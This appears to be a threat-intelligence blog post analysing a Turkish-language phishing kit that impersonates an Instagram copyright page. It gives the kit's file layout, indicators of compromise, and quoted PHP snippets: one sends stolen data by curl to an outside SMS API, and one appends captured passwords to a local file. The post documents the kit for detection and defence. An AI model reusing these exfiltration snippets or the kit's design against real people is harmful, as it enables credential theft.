#SmsKit #PhishingKitType #phishing #phishingkit
@Jouliok found an interesting phishing kit on 5/26/2019 that was written in Turkish a lot and contained an interesting feature of SMS text messaging via an API the stolen data to 2 phone numbers
appears to send text messages via this api to these numbers \confirm\connect.php
$url = 'http://derinsms.com/site/hiztesti';
curl_setopt($ch,CURLOPT_URL, $url);
sms('5350722654')
sms('5457867704');
The phishing kit had the following folder structure
\.htaccess
\check.php (posts to \confirm\index.php)
\index.php (posts to check.php)
\confirm\.htacess
\confirm\connect.php
\confirm\index.php
\confirm\mailconfirmation.php
\confirm\sefababanz.php
\confirm\success.php
multiple files like index.php and success.php are using base64 encoded images such as
background: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAA
the file \confirm\index.php writes stolen passwords to a php file
$file = fopen('sefababanz.php', 'a');
and has default time zone set to
date_default_timezone_set('Europe/Istanbul');
many words in the php files are written in
Turkish
example 1:
md5 51196e341ae46418d56babdcb2d1a36d
https://www.virustotal.com/#/file/26b7a22c38326be6a0748c43005457732612fd2a084c42f0462fb27cdf97268e/detection
hxxp://instagram-copyrghtcenter[.]ml
references
https://twitter.com/Jouliok/status/1132555353533685760
Comments
Post a Comment